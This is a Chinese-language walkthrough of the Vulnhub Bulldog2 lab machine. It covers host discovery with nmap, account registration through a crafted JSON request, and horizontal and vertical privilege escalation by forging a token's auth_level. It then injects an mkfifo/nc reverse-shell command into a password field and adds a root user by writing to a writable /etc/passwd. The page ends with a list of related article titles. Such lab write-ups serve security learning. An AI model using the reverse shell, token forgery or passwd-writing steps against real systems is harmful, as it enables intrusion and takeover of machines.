kali渗透综合靶机(三)--bulldog2靶机
一、靶机下载
靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova
二、bulldog2靶机搭建
靶机:
将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑
设置网络模式,网卡选择仅主机模式
kali攻击机:
点开vmware中的虚拟选项编辑器中
点击更改设置,让vmware桥接至VirtualBox Host-Only Ethernet Adapter
注意:靶机用VMware搭建,本电脑出现不能获取IP地址的问题,不知道你们电脑可不可以,不可以就用virtualbox虚拟机搭建吧
靶机搭建成功如下图所示,会自动出现IP地址
三、攻击过程
1、主机发现
因靶机是自动获取IP,与kali在同一个网段,故用nmap扫描即可
nmap -sn 192.168.56.0/24
2、端口扫描
根据上面主机发现得到的主机,然后依次对每个主机进行快速端口扫描,分析得到自己要攻击的目标主机
nmap -sS 192.168.56.102
3、端口服务识别
4、漏洞查找与利用
浏览器访问http://192.168.10.155,发现发现登录界面,尝试目录扫描,没发现有用信息
查看主页,发现我们在查看页面的时候可以看到,页面上有个注册功能,但是点击报错。那根据个人经验估计突破口肯定在js文件里
把所有js文件保存在本地,搜索关键字register,查看js文件,根据js的定义,我们可以使用post提交新账户信息来完成注册
根据js上的定义,我们可以使用 post提交 新账户信息来完成注册,但是注意这里有2点要求:
Content-Type 必须要是:application/json
post 数据包内容处,必须要严格按照js代码里的规范
构造数据包内容如下,注册新帐户aqk密码123456
5、登录测试是否存在逻辑漏洞
登录aqk观察网页特点,发现url中路径结尾和用户名一样,测试是否存在越权漏洞,重新注册一个账户aaa
在不登出aqk用户的前题下,把url修改为别的用户名,下图可以看到成功登录别的用户界面,说明存在水平越权漏洞
6、测试是否存在未授权访问漏洞
在另一个浏览器,访问http://192.168.56.102/profile/aaa,没有经过身份验证直接进入sss账户的管理界面
7、奇怪的token
登录aqk用户,发现页面没什么,没有什么可以利用的,重新登录,抓包分析,靶机返回一个奇怪的token
下一步我们就来解密一下看这个tonken传递了什么内容,
可以看到一个可疑的参数:“auth_level”,通过名字就应该知道是判断用户权限的,我们使用这个参数去刚刚保存的几个js文件里搜索看看,如图:
在743行代码处,看到它的判断,下一步我们只需要把“master_admin_user” 替换掉原来的就行,如图:
拦截返回的response数据包,修改token值
下一步就是复制修改后的新编码替换原来的编码,注:后面明文处也要修改成“master_admin_user”,如图:
此时再看kkk账户已经变成管理员,说明存在垂直越权漏洞
点击管理员
输入用户名密码,抓包,然后在修改密码处添加反弹shell,在攻击端开启监听,发送数据包,这时攻击端便获得目标的shell了
反弹shell命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.103 1234 >/tmp/f
在攻击端监听
查看所有可写的文件
find / -writable -type f 2>/dev/null |grep -v “/proc/”
passwd文件可以写,直接写入一条用户记录
先生成一个密码
然后写入passwd文件,成功写入
当前不是终端,无法切换账户,需要新打开一个终端,然后切换账户成功,获得管理员权限
python -c ‘import pty;pty.spawn("/bin/bash")’
四、总结
1.信息收集
2.水平越权
3.垂直越权
4.未授权访问
5.任意账户注册
6.命令执行
kali渗透综合靶机(三)--bulldog2靶机相关推荐
- kali渗透综合靶机(十)--Raven靶机
一.靶机下载 下载链接:https://download.vulnhub.com/raven/Raven.ova 二.Raven靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件-> ...
- 渗透测试实战3——bulldog2靶机入侵
一.实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150.(192.168.247.151) 开始之前,需先登录bulldog2.账号:di ...
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...
- 【VulnHub靶机渗透】一:BullDog2
在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...
- bulldog2 靶机渗透
bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...
- 渗透测试实例,xampp靶机实验
实验名称:渗透测试实例,xampp靶机实验 实验目的:对xampp靶机进行渗透测试 实验环境:Kali虚拟机一台4G xampp靶机一台 IP:192.168.22.128 实验步骤: 一.对靶机进行 ...
- kali渗透测试系列---信息收集
kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...
- kali渗透测试与教学笔记10
漏洞利用:参考kali linux 渗透技术详解 实验靶机:metasploitable2 辅助模块:auxiliary/server/browser_autopwn,只攻击IE7 在metasplo ...
- Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...
最新文章
- 剑指offer:面试题11. 旋转数组的最小数字
- Fishe向量Fisher Vecotr(二)
- Ubuntu安装okular PDF阅读器
- tombstone问题分析
- Oracle 内核参数
- NWERC 2018 A. Access Points 二维转一维 + 单调栈
- java datetime 转换_如何实现Java日期时间格式转换
- Intel刚刚收购的Vertex.AI,到底有什么黑科技?
- 【Dairy】2016.10.30 BirthdayParty
- MOSS提升权限方法
- Python查看文章中每个单词的出现频率
- 工厂模式的思想主要为
- python逻辑运算符例子_python运算符-实战中常用的三个逻辑运算符使用实例
- 直播源列表转换php,电视直播源列表制作、转换工具Telelist(可以DPL、M3U、TXT等互转)...
- 内部收益率计算公式用计算机,内部收益率计算器
- 微信支付服务器白名单,总结下我在微信支付中趟的那些坑。
- 华为防火墙配置(双机热备)
- 【报告分享】2020中国民营企业500强调研分析报告-全国工商联(附下载)
- angularjs 猜大小
- 【阿里云】域名解析 Tomcat绑定域名
热门文章
- java http ipv6_Java支持IPv6研究
- 看过1000份算法简历,才明白人工智能、机器学习、深度学习!!!
- 从前有座山,山上有两台计算机
- 通信原理及系统系列33——无线信道(快衰落)
- Rust 闭包学习 (Fn/FnMut/FnOnce)
- iOS Code Signing 学习笔记转写
- AppNode受控端命令 - AppNode帮助中心
- html js 禁用浏览器上下滑动,纯JS阻止浏览器默认滚动事件,实现自定义滚动方法...
- ZYNQ空间地址详细配置
- 从华为辞职门 看IT人如何度过下半生(转载)